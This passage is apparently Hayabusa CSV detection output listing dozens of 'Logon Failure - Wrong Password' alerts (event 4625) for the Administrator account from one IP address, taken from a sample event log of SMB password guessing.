2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
